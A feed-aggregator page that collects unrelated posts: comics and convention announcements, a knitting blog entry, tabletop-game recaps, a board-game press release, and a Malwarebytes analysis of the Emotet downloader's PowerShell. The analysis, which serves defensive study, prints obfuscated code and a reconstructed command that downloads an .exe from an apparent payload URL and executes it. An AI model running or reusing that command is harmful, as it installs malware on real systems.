Feed aggregator

PORTLAND, OR, 06/07/2018 — The critically acclaimed series by Richard Starkings (ELEPHANTMEN), Tyler Shainline (Liberty Justice), Shaky Kane (BULLETPROOF COFFIN: THE 1,000 YARD STARE, The A-Men), and John Roshell titled, THE BEEF will be collected into trade paperback and available this July.

THE BEEF brings readers the story of Meat Men. Chuck is a mild-mannered meat factory worker who is a little in love with a strawberry picker named Mary Lynn. But everything changes when Mary Lynn falls victim to the Vodino Brothers…

THE BEEF trade paperback (ISBN: 978-1-5343-0802-2, Diamond Code MAY180050) will hit stores on Wednesday, July 18th and bookstores on Tuesday, July 24th. It can be ordered on Amazon, Barnes & Noble, Books-a-Million, IndieBound, and Indigo.

Andre the Giant: Closer to Heaven Writer Joins Ongoing Catalyst Prime Title with Issue No. 10

ST. LOUIS, MO—Incidentals, created by writer/producer Ramón Govea and co-developed by Lion Forge co-founders David Steward II and Carl Reed, has been a cornerstone title in comics’ most diverse and inclusive universe since 2017.

Now, as the series moves into its third volume, Brandon Easton (Andre the Giant: Closer to Heaven) will co-write the title’s most ambitious storyline, in a first-person look at the culture of celebrity and superheroes. Two Hollywood veterans will tackle issues that have long terrorized Tinseltown behind the scenes, pitting heroes against their greatest fears in an arresting fictional account of the uglier side of filmdom.

“It has been an honor and pleasure to join the Catalyst Prime Universe and work alongside my friend and fellow creator Ramón Govea,” says writer Brandon Easton. “With our combined experiences in the tumultuous minefield of the entertainment industry as a prologue, we’re going to bring a unique sensibility to the Incidentals series. We want to explore the true costs of fame and fortune in the Hollywood dream factory, and using a superhero team as a microscope is a fun and interesting challenge.”

“We wanted to pick up a few months after the events of Issue 9 and really explore some of the unfortunate, darker truths about the entertainment industry,” says series creator and co-writer Ramón Govea. “But we’re digging into the things that haunt the Incidentals, so the team’s dynamic and emotional constitution will really be tested.”

The Incidentals are making their mark in Hollywood! Marko is managing the group as the initial offering from Luminous Talent Agency—Bo Vincent Chen’s latest entrepreneurial effort to recruit superhero talent. But rather than enjoy their new celebrity status, the Incidentals still struggle with their lack of communication, which threatens to unravel the team. Meanwhile, a mysterious new power player enters the fold with an eye to recruit our heroes . . . but can the Incidentals really trust him, or is something more sinister in motion? While the City of Angels may be caked in a layer of glitz and glam, the team finds themselves faced with what lurks just beneath the town’s shiny exterior.

The ninth issue of Incidentals debuted in stores last week and will return in an all-new series and volume on July 25, alongside the second collection of the previous series. Incidentals No. 10 pairs the new writing team with artist Jose Jaro and features covers by Ryan Brown. Reserve your copy of this essential turning point in the series and the Catalyst Prime Universe with your local comic book retailer today!

Brandon M. Easton is a professional writer based in Los Angeles, California. A native of Baltimore, Maryland, Brandon was a U.S. History and Economics teacher in NYC for six years before moving to the West Coast in 2008. Brandon has written for the 2011 ThunderCatsreboot from WB Animation andTransformers: Rescue Bots from Hasbro. Easton won the 2012 Glyph Award for his Shadowlaw series and multiple 2014 Glyph Awards and an Eisner Award nomination for the Watson and Holmescomic series. He is also the producer, director, and writer of Brave New Soulsdocumentary that explored the aspirations, inspirations, and obstacles faced by African-American speculative fiction creators in the twenty-first century.

In 2015, Brandon was selected as one of the eight winners of the 2015 Disney/ABC Writing Program, which led to his new position as a staff writer for season two of Marvel’s Agent Carter. In 2016, Brandon was nominated for the second annual Dwayne McDuffie Award for Diversity in Comics for his acclaimed graphic novel Andre the Giant: Closer to Heaven, which was recently optioned for a big-screen biopic. He also volunteers at JPL/NASA as a Solar System Ambassador to increase astronomy education in underserved communities. In May 2016, IDW Publishing announced Brandon as the writer for the M.A.S.K. reboot comic book, which garnered several 2017 Glyph Award wins, including Fan Award for Best Work and Best Male Character (Matt Trakker). Recently, Easton made history as the first Western writer to tackle the classic Japanese horror franchise Vampire Hunter D with Unified Pictures’ Vampire Hunter D: Message from Mars, released to wide acclaim. In early 2018, Brandon was announced at the writer of the Vampire Hunter D TV pilot.

Ramón Govea is a writer, producer, and builder of worlds who has developed narratives for distribution across film, television, comics, video games, and animation. In 2010, he founded Black Mast Studios, a video production company that developed and produced films and story content for digital distributors, including Gaia, Warner Bros. Digital, Machinima, and Stan Lee’s World of Heroes. He continued to hone his experience in multiplatform storytelling and marketing by writing for Scopely’s The Walking Dead: Road to Survival. By 2017, he landed two publishing deals for his creator-owned comic series: Incidentals for Lion Forge and Memoirs of a Starseed, a vertical-scroll webcomic for Tapas Media.

In 2017, as chief content officer for NBA All-Star, Baron Davis Enterprises, Ramón produced animation, books, and games for Baron’s Black Santa Company and produced official content for NBA All-Star Weekend 2018. In May 2018, he founded a new Franchise Development and Transmedia Studio with the intention of bridging these mediums together and maximizing their value through strategically developed and data-driven world building.

BALTIMORE, MARYLAND – June 7, 2018 – The Baltimore Comic-Con returns to Baltimore’s Inner Harbor on September 28-30, 2018 at the Baltimore Convention Center. Tickets are now on sale. Baltimore Comic-Con welcomes top creators of one of comics’ most iconic characters, DC Comics’ Batman, including Greg Capullo, Tom King, Jeff Parker, Craig Rousseau, Scott Snyder, and Peter Tomasi.

Greg Capullo is a self taught Illustrator, working for the past five years as artist on the New York Times best-selling, highly-acclaimed Batman series for DC Comics. He is presently co-creating the Image Comics’ book titled Reborn, along with writer Mark Millar. Prior to his Batman run, he was best known for his 80-issue run on Image Comics’ Spawn. Other popular comics work includes Marvel Comics’ X-Force and Quasar. He is also the creator of The Creech, a sci-fi/horror comic published by Image Comics. Greg has provided art for Blizzard Entertainment’s World of Warcraft, contributed lead character designs for the the award-winning HBO animated Spawn series, and was the cover artist for many popular musical groups, including Five Finger Death Punch, Korn, and Disturbed.

Ringo and Eisner Award-winning Tom King is currently the writer of Batman at DC Comics, where he has also written Mister Miracle, Grayson, The Omega Men, DC Nation, Swamp Thing Winter Special, and has a story in Action Comics #1000, not to mention his award-winning work at Marvel on The Vision. King’s first book, A Once Crowded Sky, a postmodern super hero novel, was recognized by USA Today as one of the best Graphic Novels of the year. He was named by the Hollywood Reporter as one of the five comic creators to watch in 2015.

Jeff Parker is best known for writing comic books, such as Agents of Atlas, X-Men First Class, Batman ’66, Aquaman, Future Quest, Thunderbolts, and more. His career in comics started as an penciller at Malibu, where he provided art for Solitaire. For years, Parker made a living drawing stories, as well as commercial art and storyboards for TV. At the inaugural Mike Wieringo Comic Book Industry Awards, Parker’s work on Future Quest at DC Comics won the Mike Wieringo Spirit Award.

Craig Rousseau has spent his career as an artist working on numerous noteworthy titles and runs. He has spent time on DC Comics’ Batman Beyond, Harley Quinn, and Impulse, Marvel’s Captain America & the Korvac Saga, Spider-Man Loves Mary Jane Season 2, and Iron Man & the Iron Wars, and he can be seen lately working on DC Comics’ Batman ’66, Image Comics’ Perhapanauts: Danger Down Under, and Dynamite Entertainment’s Pathfinder: Goblins!

Scott Snyder made a huge impact on the comic industry with his ground-breaking work in DC’s New 52, writing Batman (with artist Greg Capullo) and Swamp Thing. In 2011, he received Harvey and Eisner Awards for Best New Series for his work on American Vampire. In addition to these three titles, Snyder co-wrote Talon, which spun off directly from his critically-acclaimed “Court of Owls” storyline from Batman. He is currently taking the reins of DC Comics’ Justice League, writes New Challengers, and has authored such titles as Detective Comics, The Wake, Superman Unchained, All-Star Batman, Batman Eternal, Justice League: No Justice, DC Nation, Action Comics #1000, and Dark Nights: Metal.

Peter Tomasi is a writer and editor best known for his work at DC Comics. He began his career in 1993, editing such titles as Green Lantern, the Batman titles, Aquaman, Hawkman, and JSA before being promoted to Senior Editor in 2003. In 2007, Tomasi decided to move from editing to writing full-time and, in 2010, took over writing Batman and Robin with issue #20. Since the launch of the New 52, Tomasi has helmed the new volumes of both Batman and Robin and Green Lantern Corps, The Adventures of the Super Sons, Action Comics #1000, Superman, and The Kamandi Challenge at DC Comics, as well as House of Penance at Dark Horse Comics.

“Not to belittle any other character in DC or any other publisher’s retinue of heroes, but Batman is clearly one of the most globally recognizable characters — even in silhouette!” said Marc Nathan, show promoter for the Baltimore Comic-Con. “We are so excited to be hosting so many of the major players contributing to the mythology of Batman today, and expect them to be in high demand by their fans!” TICKETS
General Admission and VIP Package tickets for Weekend, Friday, Saturday, and Sunday are now on sale! Visit www.baltimorecomiccon.com/tickets/ for more information and to purchase your advanced tickets now, and as always, kids 10 and under get into the show free with a paid adult General Admission! In addition to on-site CGC grading, this year’s confirmed guests for the show include: Arthur Adams (Guardians of the Galaxy), Joel Adams (Bucky O’Hare Graphic Novel Coloring Book), Neal Adams (Deadman), Zeea Adams (Neal Adams Monsters), Arantza (fantasy artist), Brian Azzarello (100 Bullets), Jeremy Bastian (Cursed Pirate Girl), Marty Baumann (Big Hero 6), June Brigman (Power Pack), Pat Broderick (Micronauts), Mark Buckingham (Scooby Apocalypse), Buzz (Superman: The Coming of the Supermen), Greg Capullo (Dark Knights: Metal), Christa Cassano (Ghetto Klown), Howard Chaykin (Captain America), Joyce Chin (All-New Wolverine), Frank Cho (Harley Quinn), Amy Chu (Red Sonja), Steve Conley (The Middle Age), Katie Cook (Thanos Annual), Paris Cullins (WWE Superstars), Kristina Deak-Linsner (Vampirella: Roses for the Dead), Jose Delbo (Spongebob Comics), Vito Delsante (Midnight Tiger Stronger), Todd Dezago (Tellos), Garth Ennis (Jimmy’s Bastards, Friday and Saturday only), David Finch (Trinity), Meredith Finch (Rose), Jenny Frison (Wonder Woman), Steve Geiger (Web of Spider-Man), Joe Giella (The Flash), Tom Grummett (The New Titans, courtesy of Hero Initiatiive), Bob Hall (Squadron Supreme), Dean Haspiel (The Red Hook), Clinton Hobart (Disney fine artist), Jamal Igle (Molly Danger), Tony Isabella (Black Lightning), Todd Johnson (Tribe), Justin Jordan (Hal Jordan and the Green Lantern Corps), Tom King (Batman), Barry Kitson (The Flash), Alisa Kwitney (Mystik U), Leo Leibelman (Heavy Metal), Paul Levitz (Brooklyn Blood), Joseph Michael Linsner (Vampirella: Roses for the Dead), Kevin Maguire (Man of Steel), Shawn Martinbrough (Shadowman), Ron Marz (Fathom Vol. 7), Ed McGuinness (Avengers), Bob McLeod (G.I. Joe: A Real American Hero), Dawn McTeigue (Divinica), Adriana Melo (Plastic Man, courtesy of Hero Initiative), Frank Miller (Xerxes: The Fall of the House of Darius and the Rise of Alexander, Saturday and Sunday only), Stuart Moore (Deadpool the Duck), Terry Moore (Strangers in Paradise), Michael Moreci (Nightwing), Denny O’Neil (DC Universe Holiday Special, courtesy of Hero Initiative), John Ostrander (Suicide Squad, courtesy of Hero Initiative), Tom Palmer (Avengers), Dan Parent (Betty & Veronica Friends Forever), Jeff Parker (Future Quest Presents), Paul Pelletier (Titans Special), David Petersen (Mouse Guard), Brandon Peterson (Green Lanterns), Tom Peyer (Captain Kid), Richard and Wendy Pini (Elfquest), Andy Price (My Little Pony: Friendship is Magic), David Proch (Quarter Moon), Tom Raney (Giantkillers), Frank Reynoso (Garbage Pail Kids: Fables, Fantasies and Farts), Afua Richardson (Black Panther: World of Wakanda), Roy Richardson (The Flash), Don Rosa (Uncle Scrooge), Craig Rousseau (Startup), Andy Runton (Owly), P. Craig Russell (Salome and Other Stories), Stuart Sayger (GI Joe: A Real American Hero vs. The Six-Million Dollar Man), Louise Simonson (Action Comics #1000), Walter Simonson (Thor), Dan Slott (Tony Stark: Iron Man), John K. Snyder (Fashion in Action), Scott Snyder (Justice League, Saturday only), Jim Starlin (Thanos: The Infinity Siblings, Saturday and Sunday only), Joe Staton (Dick Tracy), Brian Stelfreeze (Black Panther), Jim Steranko (Action Comics), Larry Stroman (Tribe), Rob Stull (The Mike Wieringo Tellos Tribute), Peter Tomasi (Superman), David Trustman (God Slap), Sarah Trustman (The Memory Arts), Gus Vazquez (Sunfire and Big Hero Six), Rick Veitch (Rick Veitch’s The One), Magdalene Visaggio (Eternity Girl), Mark Waid (Captain America), Larry Watts (Evil Dead 2: Cradle of the Damned); Bob Wiacek (All New Wolverine), Rich Woodall (The Mike Wieringo Tellos Tribute), and Thom Zahler (Time & Vine).

www.knittedbliss.com

My Favourite Articles and Links This Week How to consciously improve your friendships. 10 bad habits that are costing you money. Our obsession with performance data is killing our performance. This is brilliant- scarves (and exercise!) for everyone! Our phones are addictive, absolutely. Here’s how Google is trying to make smartphones less addictive, how Apple

The post Pin Ups and Link Love: My Favourite Things This Week appeared first on %%www.knittedbliss.com%%.

6

"Secrets are revealed when the PC's stumble upon one of the military secrets hidden at the Turck Research Dynamics labs in the wastelands of New Jersey!" Abductor craft from tonight's game using their plasma attack on a poor sailing vessel! In tonight's retro pulp game  of Renegade Heroes, Tyrannical Conquerors, & Wasteland Kings game one of the PC' managed to board & steal a Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0

This post comes to you from high above the middle of Canada – sort of. I’m way too cheap to pay for the inflight wifi unless something really important is going on so I wrote this at 10000m above the earth and 818km an hour, somewhere over what must be Saskatchewan, but I’m posting it in the lounge in Vancouver, waiting for my flight to Seattle.

I don’t usually work on flights, or write on flights, unless I really want to. I’ve got a rule that when I’m this far off the earth I can’t possibly have a responsibility to it, and so I knit, and watch movies and this time is all my own. I fly a lot, and having this rule has made me feel a lot better about the hours I log on planes. I almost look forward to it now.

Today though, I’m blogging, and working on Bike Rally stuff and answering email and organizing and trying to land a little more caught up than I have been. It’s probably mostly hopeless, but I would really enjoy the feeling that I tried. (I have a sock in progress on my lap as consolation.) Lately I’ve been particularly delusional about what I can accomplish in a day- like, the other day? I decided I would deal with all my email, and then immediately left for a training ride I was committed to. I have no idea how I thought that I was going to answer all my mail while I was on my bike (or answer all my mail even if I was off my bike) but I knew I was going on that training ride, and I still made my completely unachievable goal to answer email. Why on earth I didn’t make the task for the day something like “ride 80km” as I strapped on my cycling shoes, will remain a mystery forever, or maybe the only way you can continue to disappoint yourself once you’re almost fifty and used to all your regular failings.

I did get a few little things done – the World’s Top Knitwear Model and I were together, and she agreed to model my finished Russell Street. (I think she was feeling the competition from Elliot, who of course, is only not the World’s Top Knitwear Model because he’s not cute on purpose.)

Pattern: Russell Street

Yarn: Autumn Rainbow Kit from Cannon Hand dyes

A nice cozy, generously sized shawl/scarf/wrap thing, finished thankfully just as summer arrived properly and Sam had to wear it in the blazing heat.

(Gratuitous grandson picture, unrelated in every way, but it should make up for the disappointment of this next bit.)

Last week I also turned my attention to that pretty little Jacob fleece. I still don’t know what I want to make – but I now that I want to make the most of the fact that they’re a spotted sheep, and see what interesting thing I can do. I started sorting the fleece… making piles of totally white, totally brown, and then a pile of locks that were mostly white with a little brown, or mostly brown with a little white.

Next I had this big plan that I was going to hand card it all. You know how people are sometimes on about “slow food” or all that stuff about being intentional? I was going to super-intentionally sit down with hand cards and a spinning cloth on my lap, and card out the little bits of VM* and make perfect and beautiful little rolags and line them up in a basket.

Then I saw my drum carder, and I thought about how much I actually want to be spinning and knitting with this, and boom. That wee machine was clamped to the table and I was throwing fleece into it.

 

It still took several hours over a few days – but I ended up with the most charming little row of batts you’ve ever seen. Four white, and then two each of three shades of grey/brown, and two dark batts of brown. (I snipped the little sunburned/bleached tips off of the dark locks, so that they would be even darker.)

They look delicious to me. I imagined bringing them with me to Port Ludlow, sitting in the sunshine and spinning, getting that all spun up so that I could start knitting it right away. I went into the kitchen and got out my travel wheel (what? Where do you keep yours?) and then couldn’t quite find it in myself to slog it all the way here when spinning time at the retreat is likely a total fantasy. Then I imagined I could ask Judith or Debbi to bring me a wheel because they’re driving, but then I thought that maybe that was a lot to ask when the spinning time is the previous mentioned fantasy. It also seemed kinda dumb to give up suitcase room to something you’re probably not going to use (and yes I already reminded myself that fibre can squash down pretty small in a suitcase) but in the end wheels are big and pragmatism won and the orderly rows of batts stayed home, on the dining room table (what? Where do you keep yours?) and I packed off without them, knowing they’ll be a really nice birthday present to myself when I get home next week.

Now I’m on this plane, an unknit sock on my lap, no time to knit it, and one word just occurred to me.

Spindle. *****

*VM is “vegetable matter”. It’s straw and seeds and crap the sheep got into. (It’s also occasionally actual crap, depending on how nicely the fleece was skirted.**)

**Skirting is when you lay out a fleece, usually right after shearing, and take off all the yucky bits around the edges. Short fibres, dirty or matted fibres, actual crap etc.***
*** This fleece was beautifully skirted and also washed so mostly it just has a little straw and grass. A fleece from Judith would never have actual crap after she dealt with it.****

****Maybe before.

*****Because you know, it’s not stupid to bring things you won’t use if they are small.

Last night was another bar night with friends specifically those us still alive & left who were around in the 90's underground gaming scene. The late 90's to early 00's saw the hobby scene change in Connecticut when many established Dungeons & Dragons game campaigns coming  home. The reason was simply, Magic The Gathering had made table space a paying premium for hobby shops. Dungeons Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0

In this review Matt goes over Merry Men from Arcane Wonders and shares his thoughts along the way. This is a great expansion for one the one of the wildest social interaction games out there!

Click here to view the video on YouTube.

This is my first attempt at a review like this. I am open to suggestions. I already have a few of my own.

Crochet along squares are perfect for summer – small, quick, and fun! Block #11 fits the bill with its clever moves, and it comes to us courtesy of Stitches n Scraps! Disclaimer: This post includes affiliate links; yarn provided by Red Heart. Just getting started with the Crochet Along? CLICK HERE for the intro info! Want [...]

The post Moogly CAL 2018 – Afghan Block #11 appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

0

In part two of our series on decoding Emotet, (you can catch up on part 1 here), we’ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.

• System.Runtime.InteropServices.Marshal: used for memory management
• SecureStringToBSTR: used to convert the secure string to decrypted data
• ConvertTo-SecureString: used to convert the encrypted data into secure string

Encryption and PowerShell

There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it’s not what our malware uses. Emotet downloader malware uses AES to encrypt data. So let’s take a look at how AES works.

If the data is encrypted using ConvertTo-SecureString but with NO key, PowerShell will by default use DPAPI. But it will only work for the logged in user on the machine it was encrypted on.

If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data and it can be decrypted on any machine, by anyone who has the encryption key. Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.

Code execution flow

In order to get to the encrypted code, we need to first understand the flow of execution. Let’s have a look at how the code is structured.

Code structure

[RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde(

From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.

[System.Runtime.InteropServices.Marshal]::
PtrToStringAuto([System.Runtime.InteropServices.Marshal]::
SecureStringToGlobalAllocUnicode

Code analysis

Now that we have a usable code structure, we can move on to the next step.

The code above is looking for an encrypted data string that can then be run through SecureString for decryption.

We now have access to the encrypted data from the VBA.

‘76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA……

We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.

Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.

For the purpose of this analysis, we’ll save it as encrypted_code.txt.

Now, we’ll pass it to a variable $vEncrypted:

$vEncrypted = [IO.File]::ReadAllText(“absolute_path\encrypted_code.txt”)

There are different ways to achieve the same result. Get-Content can also be used.

Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:

$vDecrypted = ConvertTo-SecureString -String $vEncrypted -k (key goes here)

NOTE: The malware authors would have previously used “ConvertFrom-SecureString” with a key (now hard-coded into the malware code) to encrypt the data. We’re simply reversing the process to extract the encrypted code.

The last step is to now Marshal the SecureString through the SecureString to get the decrypted code.

We’ll store the result in a variable to keep it clean and simple.

$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))

Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). The reason for this is that BSTR converts SecureString string value to a binary string (BSTR) recognized by COM. SecureStringToGlobalAllocUnicode would work as well.

That’s it. $vResult should now have the completely decrypted code with the payload URLs.

Step-by-step analysis

Now that we know the code flow, let’s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.

First of all, we’ll pass the encrypted code to the variable $vEncrypted:

As you can see below, the encrypted data has now been stored in our variable vEncrypted:

The next step now is to convert the encrypted data into SecureString by running it through ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable vDecrypted:

In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:

Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case, vResult:

It’s now time to print the output of the variable and look at the decrypted code!

We will further execute the code to extract the payload URLs and print them to console in a clean and nice way. As we can see in the code, variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.

All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.

We already have the network IOC. At this point, we can go home! But do we ever?

Reconstructing the command-line arguments

Let’s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!

Here’s our PowerShell code, structured and readable:

And here’s the same code, cleaned and beautified:

Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.

$nsadasd

This variable is assigned the value as the output of (new-object) random, which translates to System.random.

Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We’ll see that in action when we analyze $NSB.

$YYU

This variable is assigned the value “(new-object) System.Net.WebClient,” which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.

$NSB

As we saw earlier, this variable calls on the previously declared variable “nsadasd” in conjunction with “.next”, which turns the argument into the method “random.next.” This, in turn, would return a random number within the specified range (in this case, 10,000 – 282,133). As you can see below, it returns a different value each time it is executed.

$SDC

$SDC = $env:public + ‘\’ + $NSB + (‘.exe’);

This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.

We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let’s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.

Here’s the way the code is executed by the malware using variables we analyzed above:

Let’s clean up the code to make it more readable:

Now that we know the value that these variables hold, let’s reconstruct the final command-line arguments that will be passed to the system for execution:

This is what it comes down to in the end:

(New-Object) System.Net.WebClient.”DownloadFile”(http://lecap-services.fr/wiB9s.”ToString”(), C:\USers\Public\264415.exe);

The command we have above will initiate the download of the data from the specified URI and save it to a local file as “C:\USers\Public\264415.exe”.

(‘Invoke-Item’)(C:\USers\Public\264415.exe);

And this final command will start the execution of the payload.

Emotet: a complex malware

Emotet is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.

That’s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.

The post Malware analysis: decoding Emotet, part 2 appeared first on Malwarebytes Labs.

The post 1198 appeared first on Looking For Group.

From Asmodee Digital

Carcassonne Coming First, Winter 2018

 

PARIS — June 6, 2018 — Asmodee Digital, the industry leader in digital board game entertainment, announced today it will soon begin publishing games on Nintendo Switch. The first release in Asmodee Digital’s console development strategy will be Carcassonne, the digital version of the award-winning, tile-laying board game, already available for Android, PC and Mac via Steam. The Nintendo Switch™ adaptation will be available in Winter 2018.

 

“Carcassonne is the first Asmodee Digital title of many to follow on Nintendo’s platforms,” says Pierre Ortolan CEO of Asmodee Digital. “This partnership is based on Nintendo’s need for new user experiences, and Asmodee Digital’s continued goal of bringing great board game IPs to new platforms.”

“Bringing Carcassonne to the Nintendo Switch platform is an opportunity to enlarge the success of this iconic game,” said Moritz Brunnhofer, Managing Director, Hans im Glück.

 

Simple to pick up but challenging to master, Carcassonne presents players with endless opportunities for tactical play. Within minutes, players will find themselves in tough situations – determining where to put their last meeple, whether to use tiles to expand the city, or to hinder their opponent. Players place only one tile each round, and have the option to place one meeple on it. Each game develops differently, full of boundless possibilities, and the quick-fire nature of the game ensures that Carcassonne always runs at a brisk pace.

For more information:

• Visit our website: www.asmodee-digital.com

• Like us on Facebook: https://www.facebook.com/asmodeedigital/

• Follow us on Twitter: https://twitter.com/asmodeedigital

• Subscribe to us on YouTube: https://www.youtube.com/asmodeedigital

• Follow us on Instagram: https://www.instagram.com/asmodeedigital

• Twitch: https://www.twitch.tv/asmodeedigital

 

Press Kit: https://drive.google.com/drive/folders/1GkAhGN4q8_kO7wz-leDkIl9zhFE-ihJB

 

About Asmodee Digital

Asmodee Digital, a fully owned subsidiary of the Asmodee Group, is an international publisher and distributor of digital board games with operations located in Europe, North America, and China. Asmodee Digital manages the creation, design, development, publishing, and marketing of board and card games on leading digital platforms for Asmodee studios as well as for third-party publishers. The current Asmodee Digital catalog includes best-selling digital games such as Catan VR, Carcassonne, Ticket to Ride, Splendor, Agricola, Mille Bornes, Pandemic, Small World 2, Mr. Jack London, Colt Express, Mysterium, Potion Explosion, Onirim, Jaipur, Spot It! Duel, Abalone, Ticket to Ride First Journey, Catan Stories, Talisman, Fighting Fantasy Legends, Smash Up and digital versions of many other well-known board games.

 

About Hans Im Glück

Hans im Glück, founded 1981 in Munich, Germany, is an international boardgame publisher. Probably the best known brand held by HiG, is Carcassonne. This boardgames is licensed into about 30 languages and sold in about 36 countries. About 10.000.000 copies of this family were sold so far, only counting physical copies. Beside that, HiG has a strong reputation for strategic boardgames and won a large amount of international prices. For example 7 times the well known „Spiel des Jahres“ in Germany. Other successful games sold, are for example: Stone Age, The Voyages of Marco Polo and Majesty-for the realm.

 

Nintendo Switch™ is a trademark of Nintendo.

 

© 2018 Asmodee Digital & Hans im Glück Carcassonne™ is a property of Hans im Glück. All rights reserved

 

​Games are on Thursday nights sometime after 6:30PM at World's Best Comics, 9714 Warwick Blvd Newport News, Virginia 23601.

We had an extra large Philly Cheese Steak and Fresh Mozzarella pizza.

PART 1.

++++ START OF SESSION ++++

After the small ball of fire hit Huang from last week's session​ I​ remembered he was wearing his Ring of Fire Resistance from earlier in the campaign in the City of Brass on the Plane of Fire, so the "fireball" had no effect. (Actually it was a "Produce Flame" spell in shot mode, not quite a Fireball.) Consider it a non-event but useful for story flavor. The booming laugh still occurred.

Still, the huge​ glowing rune on the floor before at the cavern's entrance was still before them​ at​ ​about ten feet across. While pondering its effect, Huang and Honda were hit by a Hold Person spell and​ ​they both​ made​ their​ saving throw​s. Then Huang and Honda both leaped over it. It turned out to be a Symbol Spell, of Pain​, invoking a -2 to to Dexterity and -4 to all attacks for umpteen turns,​ or​ about an hour (i.e., until the battle is over), Then Huang and Honda charged at what was determined to be a Pit Fiend. The baddest, worstest, meanest, type of Devil from Hell short of of Devil Royalty at 120 feet away.

Meanwhile, the Pit Fiend cast a spell at the remainder of the party holed up in the thirty foot Octagonal room. Tanzen therein had a better initiative roll than the Pit Fiend by 4 segments, had line of sight to the spell caster, 150 feet away, in the dark. So Tanzen was then able to determine that a Wall of Fire spell was being cast at them, and predict its area of effect, and communicate it to the rest of the Party (including the 24 Dwarfs), and get them to evacuate the back exit.

Never did I see such and orderly decision, communication, and evacuation of 24 Dwarfs in the in the Tanzens's 4 segments (2.4 seconds) before the spell hit. Without even their own initiative roll (they didn't even get to say "Huh?" and question the evacuation order) they just got up and left. There was not even any crowding at the exit. They were of course followed by Aerys, Junkbot, and Fundisha as they did not have Rings of Fire Resistance either. (Who also did not roll initiative and were able to understand Tanzen and act in those selfsame 4 segments.)

Not to mention the Dwarf speed of 6, which in 2.4 seconds (presuming zero analysis and communication time) should have got them 24 feet, presuming they walked and did not run during the evacuation.​ It may have proved troublesome for those dwarfs at the farthest end of the 30 foot octagonal room.​

Those remaining with Rings of Fire Resistance were Numrendir, Tanzen, and Grok they moved to the center of the octagonal room. Gnomex exited the other direction towards Huang and Honda and stopped in the hallway before crossing the Rune. He cast Protection from Evil upon himself, thus preventing touch attacks by any extraplanar creature (i.e. Devils) not using a weapon.

By then the Wall of Fire hit, it turned out it was cast into the shape of a ring on the walls of the octagonal room. Just as predicted by Tanzen beforehand, from a spell caster 150 feet away, in the dark.

Huang and Honda charged​ ​towards the booming voice,​ ​although it would take two rounds to get there. Huang made it halfway towards it, Honda was slower and got one-third of the way. ​As it was, ​the Pit Fiend cast a ​Charm Person spell on Honda during her charge for which she failed her Saving Throw, so the Pit Fiend has a new friend.

After Honda was charmed, Gnomex in the meantime cast a Silence 15' Radius spell centered on the Devil.

Given Telepathic command, by her new "friend" and ally the Pit Fiend, our charmed Honda turned around, leaped back over the Rune and attacked Gnomex. Given Gnomex's awesome Armor Class, she missed. Twice.

Meanwhile.

Huang made it to the Pit Fiend but weaponless, no thanks to having his plus 2 weapon stolen during the prior session. So my Players made pause all activity (effecting stopping game time) to make a thorough rules search for anything that would allow a weaponless Monk to strike a creature that needed a plus 2 magical weapon to be hit.

45 minutes later.

The Players came upon the following idea in two parts.

